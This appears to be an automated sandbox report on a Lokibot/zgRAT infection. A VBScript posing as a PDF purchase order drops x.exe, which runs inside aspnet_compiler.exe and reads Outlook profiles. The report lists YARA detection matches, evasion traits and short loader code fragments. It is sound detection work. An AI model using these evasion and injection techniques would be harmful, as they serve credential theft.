Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: x.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winVBS@7/5@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

4_2_0040434D

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	Virustotal: Detection: 21%
Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs	ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.4.dr
Source:	Binary string: GenPo.pdb source: wscript.exe, 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257357620.000001A4739C2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, x.exe.0.dr
Source:	Binary string: BATMAN.pdb source: x.exe, 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2279959470.0000000004920000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, uvSfho6ElWCYG2yBh2.cs

.Net Code: uvS6fhoEl System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_049561C3 push edx; retf	2_2_049561C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402AC0 push eax; ret	4_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00402AC0 push eax; ret	4_2_00402AFC

Source: x.exe.0.dr

Static PE information: section name: .text entropy: 7.463409382796708

Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, kKoaNC00Ilsuv7h0CH.cs	High entropy of concatenated method names: 'W1Z6rGS9Cp', 'jmk6pX9mn1', 'rdX6OetmIV', 'dxB6WTalQ3', 'MCt6KnfaP1', 'gZe6w5JcVp', 'CRi6aGHNAf', 'Hi26Jvp82g', 'sSB6dy35sK', 'faH67UVfQ0'
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.cs	High entropy of concatenated method names: 'mHsZiWSvdd', 'KDikMXewCI', 'EeMZpXgGRt', 'aZRZOsZ8By', 'nVoZWo3dMo', 'WCaZKMLDIj', 'RVjpgCtcIp9eh', 'jUXLZN1y8q', 'rl1L8Nvwr4', 'aBrLHVrwnF'
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, M8ewUqfMiP073xJLFb.cs	High entropy of concatenated method names: 'WU6sPGG7Rc', 'OAesufhHfC', 'WLusNQPPVZ', 'wMlsjM6pYD', 'lF7so6ieNU', 'EBssgrp6Bx', 'xUWsTugHNY', 'jrGsmX2MnG', 'KDikMXewCI', 'kQTsyOHdt2'
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, esHgDhcomPxhQnZHrD.cs	High entropy of concatenated method names: 'BOeqBsSnWY', 'Bk1qA1ERtl', 'Ywg65cnyQ3', 'VQY6hkmY6N', 'few6fUqMiP', 'j736VxJLFb', 'MaQ627DWPg', 'mGs6vVmyBi', 'Or66YWWVIZ', 'Opr6zCVWWs'
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, Form1.cs	High entropy of concatenated method names: 'Dispose', 'yuRFaNFch', 'WMKDAag7F', 'KwOCm9a1r', 'hnuE92Fqk', 'z4iGxTVdc', 'J9rxfGWhf', 'eSaBRQ9vW', 'lO4A7BX7J', 'r4beKoaNC'
Source: 2.2.x.exe.23954fc.1.raw.unpack, mD28mrtr0YjvUb1q9C.cs	High entropy of concatenated method names: 'eeZC8eaaVnmWw', 'xGvadPcGk31YRbMSyws', 'mXAgVicSkYvnW59wLfe', 'llZbGZc2sYbSeeTEjmR', 'P2yKxlcqr5o1K3V0trs', 'FcnGB6chyjLxTUPOb3s', 'v9pmKAclQ3xFkLILsWU'
Source: 2.2.x.exe.23954fc.1.raw.unpack, BATMAN.cs	High entropy of concatenated method names: 's2eaZduS9', 'zPYmVBYvk', 'k5sOblnTY', 'xo1CfM32Z', 'LBDIpE0Dv', 'yPm6fCuE8', 'wqK4jOCiY', 'koatmoNxT', 'a4UyPyhqG', 'o1L9sNpkD'
Source: 2.2.x.exe.4920000.5.raw.unpack, mD28mrtr0YjvUb1q9C.cs	High entropy of concatenated method names: 'eeZC8eaaVnmWw', 'xGvadPcGk31YRbMSyws', 'mXAgVicSkYvnW59wLfe', 'llZbGZc2sYbSeeTEjmR', 'P2yKxlcqr5o1K3V0trs', 'FcnGB6chyjLxTUPOb3s', 'v9pmKAclQ3xFkLILsWU'
Source: 2.2.x.exe.4920000.5.raw.unpack, BATMAN.cs	High entropy of concatenated method names: 's2eaZduS9', 'zPYmVBYvk', 'k5sOblnTY', 'xo1CfM32Z', 'LBDIpE0Dv', 'yPm6fCuE8', 'wqK4jOCiY', 'koatmoNxT', 'a4UyPyhqG', 'o1L9sNpkD'

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe			Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
